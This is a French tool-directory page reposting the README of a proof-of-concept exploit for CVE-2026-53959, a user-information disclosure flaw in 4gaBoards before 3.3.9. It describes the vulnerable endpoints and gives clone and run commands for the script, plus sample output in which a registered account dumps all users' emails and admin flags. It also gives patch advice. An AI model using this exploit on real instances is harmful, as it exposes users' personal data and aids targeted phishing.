Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/anirbala98/cve-2026-53959
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'IntrusionApprentissage et ÉducationSécurité des API
GitHubanirbala98/cve-2026-53959

CVE-2026-53959

4gaBoards < 3.3.9 - Divulgation d'informations utilisateur

Voir le dépôt
1il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-53959 - 4gaBoards < 3.3.9 - Divulgation d'informations utilisateur

Ce dépôt contient un exploit preuve de concept (PoC) pour la CVE-2026-53959

Avertissement

Ce projet est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation d'effectuer des tests.

Vue d'ensemble

4gaBoards est un système de tableaux pour la gestion de projet en temps réel. Avant la version 3.3.9, 4gaBoards permet à tout utilisateur authentifié d'énumérer les informations de compte de chaque utilisateur via GET /api/users et de récupérer des comptes arbitraires via GET /api/users/:id. Les actions users/index et users/show reposent uniquement sur la politique par défaut is-authenticated dans server/config/policies.js, et server/api/controllers/users/index.js renvoie le résultat de sails.helpers.users.getMany() sans autorisation spécifique au demandeur ni nettoyage de la réponse. Les réponses exposent l'adresse e-mail, le téléphone, l'organisation, le nom, isAdmin, ssoGoogleEmail, ssoGithubEmail et d'autres champs d'adresses e-mail liés au SSO, y compris les données des administrateurs. Cela permet l'énumération des utilisateurs à l'échelle de l'instance, la perte de confidentialité et la reconnaissance ciblée à des fins de phishing. Ce problème est corrigé dans la version 3.3.9.

Version affectée

ComposantVersion
Vulnérable<=3.3.8
Corrigée3.3.9

Prérequis

  • Python 3.13.14
  • Requests 2.32.5

Installation

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-53959.git
cd CVE-2026-53959/
pip install -r requirements.txt

Utilisation

root@kitploit:~
python exploit.py <base_url>
python exploit.py http://localhost:3000

Exemple

root@kitploit:~
└─$ python exploit.py http://localhost:3000
[*] Creating a new user...
[+] Registration successful! 
[+] Retrieved Access Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjRjOTE1NzNmLTY5YzktNGQ5OS04ZWUxLWQ1ODZjNzZkNzAyZiJ9.eyJpYXQiOjE3ODcxMjExNzUsInN1YiI6IjE4NDQ5MDI5OTc5OTQyNDMzNTAiLCJleHAiOjE4MTg2NTcxNzV9.OwNTyxE-JS0pztbX4sLz0uzu3GjeyETNFQVbGVxzXxA

[*] Dumping user information...

{"items":[{"id":"1844837973439284230","createdAt":"2026-08-19T04:23:44.000Z","updatedAt":null,"email":"[email protected]","isAdmin":true,"isVerified":false,"name":"Demo Demo","username":"demo","phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":"2026-08-19T06:29:23.463Z","lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844837973439284230","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null},{"id":"1844902997994243350","createdAt":"2026-08-19T06:32:55.000Z","updatedAt":null,"email":"[email protected]","isAdmin":false,"isVerified":false,"name":"test","username":null,"phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":null,"lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844902997994243350","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null}]}

Atténuation

Mettez à niveau 4gaBoards vers la version 3.3.9 ou une version supérieure.

Références

  • https://www.tenable.com/cve/CVE-2026-53959
  • https://github.com/RARgames/4gaBoards/security/advisories/GHSA-p77f-p47g-h72p
Télécharger l’outil